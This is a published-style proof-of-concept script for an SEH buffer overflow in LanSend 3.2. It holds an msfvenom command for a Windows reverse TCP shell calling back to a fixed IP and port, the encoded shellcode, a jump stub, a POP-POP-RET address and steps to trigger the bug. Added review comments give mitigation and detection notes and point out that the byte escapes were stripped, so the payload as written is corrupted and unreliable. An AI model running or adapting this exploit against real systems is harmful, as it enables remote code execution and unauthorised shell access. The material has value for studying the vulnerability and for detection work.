# Exploit Title: LanSend 3.2 - Buffer Overflow (SEH)
# Exploit Author: gurbanli
# Date: 2020-05-12
# Vulnerable Software: LanSend 3.2
# Vendor Homepage: https://lizardsystems.com
# Version: 3.2
# Software Link: https://lizardsystems.com/download/lansend_setup.exe
# Tested on: Windows 7 x86

# Python 2 script: it relies on the `file()` builtin (removed in Python 3) and on
# str and bytes being the same type, so `'x90' * 30 + shellcode` further down
# would raise TypeError under Python 3.
# NOTE(review): the backslashes of the `\x..` escapes did not survive extraction
# anywhere in this listing (e.g. b"xdaxd0..." is plain ASCII text, not the
# bytes 0xda 0xd0), so the file this copy writes is NOT the original payload;
# read the byte values below as documentation of the buffer layout only.
# The file is opened in text mode ('w'); on Windows that rewrites 0x0a, which is
# presumably why the msfvenom bad-char list below excludes 0x0a/0x0d.  No `with`
# and no try/finally: the handle is released only by the explicit close() at the
# bottom, so an exception in between leaks it until interpreter exit (harmless
# for a one-shot PoC).
f = file('payload.txt','w')

"""
PoC
1. Run exploit
2. Run Lansend and Click Add Computers Wizard
3. Choose import computers from file
4. Copy/paste payload.txt content into filename section
5. shellcode will be executed

"""

"""
msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b 'x00x0ax0d'
"""

# Encoder output as emitted by the msfvenom command above (`-f py -v shellcode`).
# Defender note: x86/shikata_ga_nai is a polymorphic encoder, so a signature on
# these exact bytes is unreliable; detection is better anchored on the trigger
# (an oversized/crafted computer-import file, see the PoC steps) and on the
# outbound connection to the lhost/lport baked into the payload.
shellcode = b""
shellcode += b"xdaxd0xd9x74x24xf4x58xbexa4x95xaf"
shellcode += b"xc4x2bxc9xb1x52x31x70x17x03x70x17"
shellcode += b"x83x4cx69x4dx31x70x7ax10xbax88x7b"
shellcode += b"x75x32x6dx4axb5x20xe6xfdx05x22xaa"
shellcode += b"xf1xeex66x5ex81x83xaex51x22x29x89"
shellcode += b"x5cxb3x02xe9xffx37x59x3exdfx06x92"
shellcode += b"x33x1ex4excfxbex72x07x9bx6dx62x2c"
shellcode += b"xd1xadx09x7exf7xb5xeex37xf6x94xa1"
shellcode += b"x4cxa1x36x40x80xd9x7ex5axc5xe4xc9"
shellcode += b"xd1x3dx92xcbx33x0cx5bx67x7axa0xae"
shellcode += b"x79xbbx07x51x0cxb5x7bxecx17x02x01"
shellcode += b"x2ax9dx90xa1xb9x05x7cx53x6dxd3xf7"
shellcode += b"x5fxdax97x5fx7cxddx74xd4x78x56x7b"
shellcode += b"x3ax09x2cx58x9ex51xf6xc1x87x3fx59"
shellcode += b"xfdxd7x9fx06x5bx9cx32x52xd6xffx5a"
shellcode += b"x97xdbxffx9axbfx6cx8cxa8x60xc7x1a"
shellcode += b"x81xe9xc1xddxe6xc3xb6x71x19xecxc6"
shellcode += b"x58xdexb8x96xf2xf7xc0x7cx02xf7x14"
shellcode += b"xd2x52x57xc7x93x02x17xb7x7bx48x98"
shellcode += b"xe8x9cx73x72x81x37x8ex15x02xd7xda"
shellcode += b"x65x32xdaxdax74x9fx53x3cx1cx0fx32"
shellcode += b"x97x89xb6x1fx63x2bx36x8ax0ex6bxbc"
shellcode += b"x39xefx22x35x37xe3xd3xb5x02x59x75"
shellcode += b"xc9xb8xf5x19x58x27x05x57x41xf0x52"
shellcode += b"x30xb7x09x36xacxeexa3x24x2dx76x8b"
shellcode += b"xecxeax4bx12xedx7fxf7x30xfdxb9xf8"
shellcode += b"x7cxa9x15xafx2ax07xd0x19x9dxf1x8a"
shellcode += b"xf6x77x95x4bx35x48xe3x53x10x3ex0b"
shellcode += b"xe5xcdx07x34xcax99x8fx4dx36x3ax6f"
shellcode += b"x84xf2x5ax92x0cx0fxf3x0bxc5xb2x9e"
shellcode += b"xabx30xf0xa6x2fxb0x89x5cx2fxb1x8c"
shellcode += b"x19xf7x2axfdx32x92x4cx52x32xb7"

"""
047FFF09 59 POP ECX
047FFF0A 59 POP ECX
047FFF0B 80C1 64 ADD CL,64
047FFF0E ^FFE1 JMP ECX
"""
# Seven-byte stub matching the disassembly above: two POPs, then ADD CL,0x64
# (adjusts only the low byte of ECX, so it silently assumes no carry out of CL
# -- TODO confirm), then JMP ECX.  Where ECX points at that moment is not
# visible here; presumably it lands in the NOP sled ahead of the shellcode.
jmp_to_shellcode = 'x59x59x80xc1x64xffxe1'

"""ppr 00417a47"""

# Buffer layout written to payload.txt, left to right:
#   'x90' * 30         NOP sled (intended as 30 x 0x90; see the escape note at top)
#   shellcode          encoded payload
#   jmp_to_shellcode   7-byte stub from the disassembly above
#   'A' * 12           filler up to the SEH record
#   'xebxebx90x90'     nSEH: short backward jump (EB EB) plus two NOPs
#   'x47x7ax41'        SEH handler: 0x00417a47 little-endian ("ppr 00417a47"
#                      above); only three bytes are emitted, so the leading 0x00
#                      is not written by this script -- TODO confirm how the
#                      target terminates the string.
# Mitigation/detection notes: a handler address rejected by SafeSEH (module
# opted in) or SEHOP (host policy) would break this overwrite, and DEP would
# stop stack-resident shellcode from running; the attack surface is the
# "import computers from file" path, so the crafted file itself is the
# forensic artefact to look for.
payload = 'x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + 'xebxebx90x90' + 'x47x7ax41'
f.write(payload)
f.close()